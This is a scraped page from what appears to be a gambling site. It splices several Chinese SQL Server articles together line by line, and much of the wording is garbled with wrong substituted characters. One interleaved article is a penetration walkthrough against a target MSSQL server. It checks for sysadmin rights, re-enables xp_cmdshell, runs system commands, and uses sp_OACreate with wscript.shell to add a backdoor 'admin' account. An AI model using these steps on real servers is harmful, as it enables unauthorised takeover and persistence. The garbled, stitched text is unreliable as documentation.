澳门新萄京官方网站-www.8455.com-澳门新萄京赌场网址

澳门新萄京官方网站:文件操作方法,Server如何

2019-09-11 作者:数据库网络   |   浏览(153)

在master数据库中,SQL Server提供系统扩充的储存进程,其中有一对存储进程的命名以xp_始发,用于拍卖操作系统的文书。

在master数据库中,SQL Server提供系统扩张的储存进程,在这之中有部分积存进度的命名以xp_起先,用于拍卖操作系统的文书。

前言:

正文转自:

 

一,推断文件是或不是留存

一,剖断文件是或不是留存

从事于复现最实用的纰漏使用进程。

不当描述】:

前些天首要查究下SQL Server存款和储蓄进程的应用及优化方案。

积攒进度sys.xp_fileexist 用于判别文件是或不是留存,参数是文本(file)的路径或目录的路子:

存款和储蓄进程sys.xp_fileexist 用于剖断文件是或不是留存,参数是文本(file)的路子或目录的路径:

正文将指点大家学习以下内容:

  SQL Server阻止了对组件‘xp_cmdshell’的过程‘sys.xp_cmdshell’的拜见。因为此组件已作为此服务嚣安全布局的一片段而被关闭。系统管理员能够经过利用sp_configure启用‘xp_cmdshell’。有关启用‘xp_cmdshell’的详细新闻,请参阅sQL援助文件。

     存款和储蓄进程:由于本身此前的一篇小说对存款和储蓄进程轻便的做了概述,此间就不再赘言了。明天来看下存款和储蓄进度的高端应用。

exec master.sys.xp_fileexist 'D:test.txt'
exec master.sys.xp_fileexist 'D:test.txt'
  • 学学应用`xp_cmdshell`扩张存款和储蓄进程
  • 读书调用`wscript.shell`
  • 学习MSSQL写文件
  • 学习沙盘方式提权
  • 学习注册表影像威吓提

    part1 使用`xp_cmdshell`扩展存款和储蓄进度

【原因深入分析】:   xp_cmdshell可以让系统管理员以操作系统命令行解释器的不二等秘书籍施行给定的吩咐字符串,并以文本行格局赶回任何输出,是一个作用特别庞大的庞大存贮进程。一般情况下,xp_cmdshell对领队来讲也是不要求的,xp_cmdshell的解除不会对Server产生任何影响。 【化解办法】: 1、通过SQL语句开启。[推荐介绍此方法,因为在其余版本的SQL SE瑞虎VEHummerH第22中学都能够动用。] 通过询问深入分析器,选拔Master数据库,然后实践以下SQL内容:

率先来看下存款和储蓄进度能够包含怎么样内容:

该存款和储蓄进程再次回到的结果集有一行数据,多个字段,如下图:

该存储进程再次回到的结果集有一行数据,多少个字段,如下图:

**步骤1 连接MSSQL服务**  

首先打开SQL查询分析器如下填写相关参数(此处数据库相关信息假设是我们通过前期[渗透测试](http://bbs.ichunqiu.com/thread-17737-1-1.html?from=bkyl)得到。  
相关参数填写完毕之后点击`确定`进入该服务器MSSQL查询分析页面。  
登入对方的MSSQL服务之后,我们看到SQL查询分析器的界面如下,请看图示,了解查询分析器的功能页:  

![](https://images2017.cnblogs.com/blog/990426/201707/990426-20170728115101696-330111593.png)   

如果没有出现左侧的对象浏览器,请点击如上图示的右上角红框部分来开启对象浏览器。  

查询框用于输入将要执行查询的SQL语句。  

比如,我们在查询框输入一下语句来查看数据库信息和系统版本:  
sp_configure 'show advanced options',1
reconfigure
go
sp_configure 'xp_cmdshell',1
reconfigure
go

澳门新萄京官方网站 1

澳门新萄京官方网站 2

澳门新萄京官方网站 3

select @@version

推行结果:

     从图中能够见到,存款和储蓄进程不唯有带有单个select语句,还可以够饱含select语句块,比方Case When,同样还足以包罗逻辑调节语句,如if—else等。

二,成立子目录

二,创立子目录

MSSQL语句后边能够跟`;`终止查询或三番五次多句询问。前面跟`--`能够到达注释现在多余的言语的目标。

  配置选项 'show advanced options' 已从 0 退换为 1。请运维 RECONFIGURE 语句实行安装。   配置选项 'xp_cmdshell' 已从 0 改动为 1。请运行RECONFIGURE 语句举办设置。

小心:存款和储蓄进程中也得以分包insert,update和delete语句。

积累进度 sys.xp_create_subdir 用于创制子目录,参数是子目录的路径:

储存进度 sys.xp_create_subdir 用于创设子目录,参数是子目录的路径:

暗中同意意况下大家查看到的结果并不完整,是表格查看方式,为了更显然的查阅到SQL查询重临,大家点击工具栏的`查询`->`文件彰显结果`,然后再实行SQL语句:

如需关闭只需将“sp_configure 'xp_cmdshell',1”改为“sp_configure 'xp_cmdshell',0”即可。

然后大家来看下扩大存款和储蓄进度xp_cmdshell的用法

exec master.sys.xp_create_subdir 'D:test'
exec master.sys.xp_create_subdir 'D:test'

澳门新萄京官方网站 4

案例:启用xp_cmdshell

进行存款和储蓄进度,系统再次回到新闻:Command(s) completed successfully,表达子目录创形成功。

推行存款和储蓄进度,系统再次回到音讯:Command(s) completed successfully,表明子目录创制作而成功。

那儿能够见见完好的询问结果为:

    SQL  Server三千中启用扩展存款和储蓄进度:

三,查看子目录结构

三,查看子目录结构

Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86) class="Apple-converted-space"> 
        Oct 14 2005 00:33:37 
        Copyright (c) 1988-2005 Microsoft Corporation
        Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
        
(所影响的行数为 1 行)

  Use master

储存进程sys.xp_dirtree 用于呈现当前目录的子目录,该存款和储蓄进度有四个参数:

仓库储存进程sys.xp_dirtree 用于体现当前目录的子目录,该存储进程有四个参数:

MSSQL版本:`Microsoft SQL Server 2005`

  Exec sp_addextendedproc xp_cmdshell,'xplog70.dll'

  • directory:第二个参数是要询问的目录;
  • depth :第二个参数是要显得的子目录的纵深,暗中同意值是0,表示展现全部的子目录;
  • file :第七个参数是bool类型,钦命是不是展现子目录中的文件(file),暗中认可值是0,表示不呈现另外文件,只展现子目录(directory);

    exec master.sys.xp_dirtree 'D:data'

  • directory:第一个参数是要询问的目录;
  • depth :第4个参数是要体现的子目录的纵深,默许值是0,表示展现全体的子目录;
  • file :第八个参数是bool类型,钦定是还是不是显示子目录中的文件(file),默许值是0,表示不展现别的文件,只彰显子目录(directory);

服务器版本:`Windows NT 5.2(windows2003)`

  Go

该存款和储蓄进程重返的字段有子目录名称和相对深度,重返的结果中并从未展现子目录的父子关系:

exec master.sys.xp_dirtree 'D:data'

步骤2 表明权限并尝试实行

   SQL  Server 2005或SQL Server 2008启用xp_cmdshell

 澳门新萄京官方网站 5

该存款和储蓄进程重返的字段有子目录名称和相对深度,再次回到的结果中并从未展现子目录的老爹和儿子关系:

大家利用一下SQL语句来质量评定对方的MSSQL服务是不是为`SA`权限(`sa`权限的MSSQL客商一般的话对应的是系统的`system`权限):

  sp_configure 'xp_cmdshell',1

四,删除文件

澳门新萄京官方网站 6

select IS_SRVROLEMEMBER('sysadmin')

  go

积攒进度 sys.xp_delete_file 用于删除文件,该存储进度有5个参数:

四,删除文件

借使查询结果回到`1`则注脚是`SA`权限,很幸运,大家的目的机的`MSSQL`账户对应的是`SA`
权限。

  reconfigure --让sp_configure立时生效

  • 首先个参数是文件类型(File Type),有效值是0和1,0是指备份文件,1是指报表文件;
  • 第贰个参数是目录路线(Folder 帕特h), 目录中的文件会被删去,目录路径必需以“”结尾;
  • 其几个参数是文件的庞大名(File Extension),常用的扩展名是'BAK' 或'TEnclaveN';
  • 第七个参数是Date,早于该日期成立的文件将会被剔除;
  • 第三个参数是子目录(Subfolder),bool类型,0是指忽略子目录,1是指将会删除子目录中的文件;

积累过程 sys.xp_delete_file 用于删除文件,该存款和储蓄进程有5个参数:

行使以下SQL语句决断指标机的MSSQL服务是不是留存`xp_cmdshell`扩张存款和储蓄进程:

  go

该存款和储蓄进程不会删除任性档案的次序的文书,系统限制它只好删除特定项目(备份文件和表格文件)的文件。

  • 率先个参数是文件类型(File Type),有效值是0和1,0是指备份文件,1是指报表文件;
  • 其次个参数是目录路线(Folder Path), 目录中的文件会被删去,目录路径必需以“”结尾;
  • 其两个参数是文本的增添名(File Extension),常用的恢弘名是'BAK' 或'T路虎极光N';
  • 第八个参数是Date,早于该日期创造的文书将会被去除;
  • 第多个参数是子目录(Subfolder),bool类型,0是指忽略子目录,1是指将会删除子目录中的文件;

select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell';

  --开启高档选项

declare @Date datetime = dateadd(day,-30,getdate())
exec master.sys.xp_delete_file 0,'D:test','bak',@Date,0

该存款和储蓄进度并不得以去除全部的文件,系统限制它不得不删除特定项指标文本。

倘使回到结果不是`0`就表明存在`xp_cmdshell`壮大存款和储蓄进度,启用没启用大家稍后再作判定:

  sp_configure 'show advanced options',1

五,查看磁盘驱动的空余空间

declare @Date datetime = dateadd(day,-30,getdate())
exec master.sys.xp_delete_file 0,'D:test','bak',@Date,0

澳门新萄京官方网站 7 

  go

储存进程 sys.xp_fixeddrives用于查看磁盘驱动器剩余(free)的上空

五,查看磁盘驱动的空余空间

如上,查询重临`1`,便是存在`xp_cmdshell`扩充存款和储蓄进度,那么大家尝试执行以下SQL语句使用`xp_cmdshell`扩充存款和储蓄进程来实施系统命令`whoami`(查看当前系统权限):

  reconfigure

exec sys.xp_fixeddrives

存款和储蓄进度 sys.xp_fixeddrives用于查看磁盘驱动器剩余(free)的半空中

Exec master..xp_cmdshell 'whoami';

  go

澳门新萄京官方网站 8

exec sys.xp_fixeddrives

澳门新萄京官方网站 9 

     表明:服务器选项总共有四十二个,私下认可境况下,sp_configure存款和储蓄进程只体现中间的11个,展现结果中不分包高端选项,而且具有新的SQL Server配置选项都不会现出在那几个轻易的清单中。可是,大家得以选用show advanced options命令参数让SQL Server展现出具备选项。

六,实践DOS命令操作文件

澳门新萄京官方网站 10

指令并不曾实施成功,获得了如下错误音讯。

  案例:禁用/删除xp_cmdshell

积存进度sys.xp_cmdshell 用于实践DOS命令,该意义对应SQL Server系统的xp_cmdshell高档选项,暗中同意境况下,该选拔是剥夺的,施行该存款和储蓄进度,系统会抛出荒唐音信:

六,推行DOS命令操作文件

Error Message:SQL Server 阻止了对组件 'xp_cmdshell' 的 过程'sys.xp_cmdshell' 的拜望,因为此组件已作为此服务器安全配备的一片段而被关门。系统管理员能够由此使用 sp_configure 启用 'xp_cmdshell'。有关启用 'xp_cmdshell' 的详细消息,请参阅 SQL Server 联机丛书中的 "外围应用配置器"。

    Sql server 2000去除增添存储进程

SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_澳门新萄京官方网站:文件操作方法,Server如何启用xp_cmdshell组件。cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.

积存进程sys.xp_cmdshell 用于试行DOS命令,该意义对应SQL Server系统的xp_cmdshell高等选项,暗中同意情状下,该选用是剥夺的,实施该存款和储蓄进度,系统会抛出错误音信:

步骤3 修复扩张存款和储蓄进度
碰巧的是大家从报错消息方可吸取,`xp_cmdshell`扩大存款和储蓄进程没被剔除,只是禁止访问。于是大家就足以因此SQL语句启用它。
(如若不帮助多句实践的话,请单独推行以分行分割的每句):

    --删除扩大存款和储蓄进度

就此,在实施该存款和储蓄进度从前,必得启用xp_cmdshell选项,由于启用该选项有秘密的高危害,建议客商在进行代码之后,禁止使用该选项。

SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.

EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;

    use master

1,启用/禁用xp_cmdshell选项

由此,在试行该存款和储蓄进度在此之前,必需启用xp_cmdshell选项,由于启用该选项有秘密的高风险,提出客商在实行代码之后,禁止使用该选项。

澳门新萄京官方网站 11 

    exec sp_dropextendedproc 'xp_cmdshell'

xp_cmdshell选项属于系统的高端选项,试行以下代码,允许客户修改高端选项:

1,启用/禁用xp_cmdshell选项

上述SQL语句的实行回来如下:

    go

-- To allow advanced options to be changed.  
exec sys.sp_configure 'show advanced options', 1;  
go  
-- To update the currently configured value for advanced options.  
reconfigure;  
go  

xp_cmdshell选项属于系统的高等选项,实行以下代码,允许顾客修改高等选项:

安插选项 'show advanced options' 已从 0 更动为 1。请运维 RECONFIGURE 语句进行设置。
布署选项 'xp_cmdshell' 已从 0 改造为 1。请运维 RECONFIGURE 语句进行安装。

  提高存款和储蓄进程品质的不二等秘书诀

动用以下代码启用xp_cmdshell选项:

-- To allow advanced options to be changed. 
exec sp_configure 'show advanced options', 1; 
go 
-- To update the currently configured value for advanced options. 
reconfigure; 
go 

SQL查询重临如上则表明`xp_cmdshell`扩张存款和储蓄进度启用成功。

    01,使用 set nocount on

-- To enable the feature.  
exec sys.sp_configure 'xp_cmdshell', 1;  
go  
-- To update the currently configured value for this feature.  
reconfigure;  
go 

利用以下代码启用xp_cmdshell选项:

启用未来大家再使用以下SQL语句使用`xp_cmdshell`扩张存款和储蓄进程试行系统命令:

    语法 
    SET NOCOUNT { ON | OFF } 

选择以下代码禁止使用xp_cmdshell选项:

-- To enable the feature. 
exec sp_configure 'xp_cmdshell', 1; 
go 
-- To update the currently configured value for this feature. 
reconfigure; 
go

Exec master..xp_cmdshell 'whoami';

    注释 
    当 SET NOCOUNT 为 ON 时,不回去计数(表示受 Transact-SQL 语句影响的行数)。当 SET NOCOUNT 为 OFF 时,再次回到计数。 

-- To disable the feature.  
exec sys.sp_configure 'xp_cmdshell', 0;  
go  
-- To update the currently configured value for this feature.  
reconfigure;  
go 

行使以下代码禁止使用xp_cmdshell选项:

澳门新萄京官方网站 12 

    当 SET NOCOUNT 为 ON 时,将不给客商端发送存款和储蓄进度中的种种语句的 DONE_IN_PROC 新闻。当使用 Microsoft SQL Server 提供的实用工具推行查询时,在        Transact-SQL 语句(如 SELECT、INSERT、 UPDATE 和 DELETE)停止时将不会在询问结果中显得"nn rows affected"。 

2,常用的DOS命令

-- To disable the feature. 
exec sp_configure 'xp_cmdshell', 0; 
go 
-- To update the currently configured value for this feature. 
reconfigure; 
go

语句施行回显如下:

  02,收缩可选参数

该存储进程使得客户能够通过TSQL命令执行DOS命令,参数是命令字符串:

2,常用的DOS命令

output                                                                                                                                                                                                          

                                               class="Apple-converted-space"> 

nt authoritysystem
NULL

(所影响的行数为 2 行)

  03,优化SQL语句

exec sys.xp_cmdshell 'command_string' 

该存储进程使得客商能够通过TSQL命令实施DOS命令,

如上,我们中标赢得回显,得知当前客户权限是`SYSTEM`.

    001,制止频仍拜见同一张或多张表

2.1 创立新文件或追加文件内容

exec sys.xp_cmdshell 'command_string'

自然也得以展开windows的账户操作:

    002,尽量幸免大批量业务操作

格式:ECHO 文件内容>file_name  

2.1 建构新文件或追Gavin件内容

Exec master..xp_cmdshell 'net user';

    003,尽量防止使用游标

exec master.dbo.xp_cmdshell 'echo abc > D:sharetest.txt'

格式:ECHO 文件内容>file_name 

> `net user`指令查看系统当下客户意况 

    004,注意where语句写法

2.2 查看文件内容

exec master.dbo.xp_cmdshell 'echo abc > D:sharetest.txt'

步骤4 持续管理

       必得考虑语句顺序,应该依附目录顺序、范围大小来分明标准子句的内外相继,尽恐怕的让字段顺序与索引顺序相平等,范围从大到小。

格式:TYPE file_name 

2.2 查看文件内容

如果`xp_cmdshell`恢宏存款和储蓄进程被删除,能够运用以下语句再次增加:

    005,尽量使用exists替代select count()剖断是或不是存在记录,count函数唯有在总括表中全数行数时选拔,何况count(1)比count(*)更有作用。

exec master.dbo.xp_cmdshell 'type D:sharetest.txt'

格式:TYPE file_name

EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int;

sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll';

    006,注意表之间总是的数据类型

2.3 复制文件

exec master.dbo.xp_cmdshell 'type D:sharetest.txt'

行使以下语句来卸载存款和储蓄进程`xp_cmdshell`:

    007,先写DDL,再写DML

格式: COPY  file_name  new_folder 

2.3 复制文件

EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 0;RECONFIGURE;

    008,合理使用索引

exec master.dbo.xp_cmdshell 'copy D:testtest.txt D:share'

格式: COPY  file_name  new_folder

得到如下重临:

      要留心索引的护卫,周期性重新建构索引,重新编写翻译存款和储蓄进程。

2.4 展现目录

exec master.dbo.xp_cmdshell 'copy D:testtest.txt D:share'

配备选项 'show advanced options' 已从 1 改造为 1。请运转 RECONFIGURE 语句举办设置。
布局选项 'xp_cmdshell' 已从 1 退换为 0。请运转 RECONFIGURE 语句进行安装。

    009,合理利用tempdb系统表

格式:DIR folder

2.4 彰显目录

剥夺之后咱们再尝试运用`xp_cmdshell`扩充存款和储蓄进程实践命令将不会中标:

      I,尽量防止使用distinct、order by、group by、having、join语句

exec master.dbo.xp_cmdshell 'dir D:share' 

格式:DIR folder

Exec master..xp_cmdshell 'whoami';

      II,制止频仍创设和删除有的时候表

2.5 创设目录

exec master.dbo.xp_cmdshell 'dir D:share'

澳门新萄京官方网站 13 

      III,有时表中插入数据过大,可应用select into代替create table

格式:MD folder_name

2.5 创造目录

一旦想根本删除`xp_cmdshell`扩大存款和储蓄进程,建议在C盘里一直找出`xplog70.dll` ,然后删除之。

      IV,使用了有时表,要在蕴藏进度最终显式删除

exec master.dbo.xp_cmdshell 'md D:sharetest'

格式:MD folder_name

part2 调用`wscript.shell`

      V,幸免使用大有的时候表与其余大数量量表的链接查询和退换

2.6 删除目录

exec master.dbo.xp_cmdshell 'md D:sharetest'

步骤1 恢复`sys.sp_OACreate`

  Sqlprofiler的使用

格式:RD folder

2.6 删除目录

当`xp_cmdshell`扩大存款和储蓄进度被剔除或许不能够运用的情形,大家无妨试试利用`SP_OACreate`和`SP_OAMETHOD`调用系统`wscript.shell`奉行系统命令。

    通过Sqlprofiler能够检验到别的SQL  server语句的实践,援助我们解析SQL语句的终极奉行进度。

exec master.dbo.xp_cmdshell 'rd D:sharetest' 

格式:RD folder

Declare @runshell INT;Exec SP_OACreate 'wscript.shell',@runshell out;Exec SP_OAMeTHOD @runshell,'run',null,'net user admin 123456 /add';

    使用形式:打开工具→SQL Server Profiler如下图

2.7 删除文件

exec master.dbo.xp_cmdshell 'rd D:sharetest'

如下可见,默许是不行的,有如下报错信息:

         澳门新萄京官方网站 14

格式:DEL file_name

2.7 删除文件

SQL Server 阻止了对组件"奥莱 Automation Procedures"的 进程"sys.sp_OACreate"的访问,因为此组件已当做此服务器安全配置的一部分而被关闭

点击连接,出现下图分界面

exec master.dbo.xp_cmdshell 'del D:sharetest.txt' 

格式:DEL file_name

使用 `Ole Automation Procedures` 选项可内定是还是不是能够在 `Transact-SQL` 批管理中实例化 `OLE Automation` 对象。 还足以行使基于政策的军管照旧 `sp_configure` 存储进程来布置这一选项。 有关详细音讯,请参阅外围应用配置器。
可以将 `Ole Automation Procedures` 选项设置为以下值:

    澳门新萄京官方网站 15

2.8 重命名文件

exec master.dbo.xp_cmdshell 'del D:sharetest.txt'

>`0`:禁止使用 OLE Automation Procedures。 SQL Server 新实例的暗中同意值。
>`1`:启用 OLE Automation Procedures。

点击运营

格式:REN [盘符:][路径]〈旧文件名〉〈新文件名〉

2.8 重命名文件

当启用 `OLE Automation Procedures `时,对 `sp_OACreate`的调用将会运行 `OLE` 分享实行情形。
能够利用 `sp_configure` 系统存款和储蓄进程来查阅和退换 `Ole Automation Procedures` 选项的近年来值。

 澳门新萄京官方网站 16

exec master.dbo.xp_cmdshell 'ren D:testtest.txt new.txt' 

格式:REN [盘符:][路径]〈旧文件名〉〈新文件名〉

举办以下SQL语句查看 `OLE Automation Procedures` 的如今安装:

该分界面能够查阅SQL Server的追踪消息。

2.9 移动文件

exec master.dbo.xp_cmdshell 'ren D:testtest.txt new.txt'

EXEC sp_configure 'Ole Automation Procedures';

 澳门新萄京官方网站 17

格式:MOVE  file_name new_folder

2.9 移动文件

暗中同意景况下回到以下新闻

今日暂且研讨到此地,希望能给大家带来扶助!

exec master.dbo.xp_cmdshell 'move D:testnew.txt D:share' 

格式:MOVE  file_name new_folder

minimum  maximum  config_value run_value


   0        1          0           0

 

2.10 切换目录

exec master.dbo.xp_cmdshell 'move D:testnew.txt D:share'

如上,`config_value` 和`run_value`的值都为0,表示禁止使用。

 

格式:CD[盘符:][路径名][子目录名]

2.10 切换目录

实行以下SQL语句启用 `OLE Automation Procedures`:

3,执行BCP命令

格式:CD[盘符:][路径名][子目录名]

exec sp_configure 'show advanced options', 1;  RECONFIGURE;  exec sp_configure 'Ole Automation Procedures', 1;  RECONFIGURE;

 

总结

澳门新萄京官方网站 18 

参照文书档案:

上述所述是小编给我们介绍的SQL Server 文件操作方法,希望对我们有着匡助,如果我们有其余疑问请给小编留言,小编会及时还原大家的。在此也特别谢谢我们对台本之家网址的帮忙!

配备选项 'show advanced options' 已从 0 改造为 1。请运转 RECONFIGURE 语句进行安装。
安插选项 '奥莱 Automation Procedures' 已从 0 更换为 1。请运维RECONFIGURE 语句实行设置。

xp_cmdshell Server Configuration Option

您也许感兴趣的文章:

  • 全盘化解SQL Server 安装难点:在此以前的某部程序安装已在安装Computer上创建挂起的文书操作
  • 不曾SQL Server数据库时如何展开.MDF文件
  • SqlServer修改数据库文件及日志文件贮存地点
  • SQL Server 压缩日志与削减SQL Server 文件大小的措施
  • 什么苏醒SQL Server 两千破坏的数据库文件
  • 教你轻巧恢复生机/修复SQL Server的MDF文件
  • SQL Server 二〇〇七删减日志文件的三种方法小结

步骤2 利用`sys.sp_OACreate`

xp_cmdshell (Transact-SQL)

再试试利用`SP_OACreate`和`SP_OAMETHOD`调用系统`wscript.shell`试行系统命令。

常见dos命令总计

Declare @runshell INT;Exec SP_OACreate 'wscript.shell',@runshell out;Exec SP_OAMeTHOD @runshell,'run',null,'net user admin 123456 /add';

DOS中的ECHO命令详解

一般来讲图可知,未有报错,成功实践了询问,不过未有观望CMD命令的回显:

澳门新萄京官方网站 19 

那就是说大家得以尝试选拔`xp_cmdshell`来证实账户是还是不是丰裕成功:

如果`xp_cmdshell`举办存款和储蓄进程不设有,先采取以下语句恢复生机:

EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;

然后施行以下语句验证是不是经过动用`SP_OACreate`和`SP_OAMETHOD`调用系统`wscript.shell`实行了加多admin账户的系统命令:

Exec master..xp_cmdshell 'net user admin';

澳门新萄京官方网站 20 

如上图,存在admin账户,利用成功。

本文由澳门新萄京官方网站发布于数据库网络,转载请注明出处:澳门新萄京官方网站:文件操作方法,Server如何

关键词: